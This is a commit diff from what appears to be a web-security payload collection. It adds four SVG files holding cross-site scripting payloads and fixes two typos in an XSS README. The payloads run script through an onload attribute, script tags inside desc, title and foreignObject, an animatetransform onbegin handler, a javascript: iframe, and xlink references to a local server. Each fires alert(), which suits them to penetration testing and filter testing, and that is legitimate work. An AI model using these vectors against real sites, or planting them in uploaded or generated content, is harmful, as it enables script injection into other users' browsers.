SVG XSS fix typo from #729 + files

XSS Injection/Files/SVG_XSS_nested_img_xlink.svg

@@ -0,0 +1,3 @@
+<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
+</svg>

XSS Injection/Files/SVG_XSS_nested_svg.svg

@@ -0,0 +1,10 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <svg x="10">
+    <rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
+    <script type="text/javascript">alert('sub-svg 1');</script>
+  </svg>
+  <svg x="200">
+    <rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
+    <script type="text/javascript">alert('sub-svg 2');</script>
+  </svg>
+</svg>

XSS Injection/Files/SVG_XSS_nested_use_xlink.svg

@@ -0,0 +1,3 @@
+<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+  <use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
+</svg>

XSS Injection/Files/SVG_XSS_red_lightning.svg

@@ -0,0 +1,15 @@
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
+  <polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
+  <desc><script>alert('svg desc')</script></desc>
+  <foreignObject><script>alert('svg foreignObject')</script></foreignObject>
+  <foreignObject width="500" height="500">
+    <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
+  </foreignObject>
+  <title><script>alert('svg title')</script></title>
+  <animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
+  <script type="text/javascript">
+    alert('svg script');
+  </script>
+</svg>

XSS Injection/README.md

@@ -398,7 +398,7 @@ Simple script. Codename: green triangle
 </svg>
 ```
 
-More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red lignthning. Author: noraj.
+More comprehensive payload with svg tag attribute, desc script, foreignObject script, foreignObject iframe, title script, animatetransform event and simple script. Codename: red ligthning. Author: noraj.
 
 ```xml
 <?xml version="1.0" standalone="no"?>
@@ -443,7 +443,7 @@ SVG 1.x (xlink:href)
 </svg>
 ```
 
-Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc sicne the `style` attribute is no longer a vector on modern browsers. Author: noraj.
+Including a remote SVG fragment in a SVG works but won't trigger the XSS embedded in the remote SVG element because it's impossible to add vulnerable attribute on a polygon/rect/etc since the `style` attribute is no longer a vector on modern browsers. Author: noraj.
 
 SVG 1.x (xlink:href)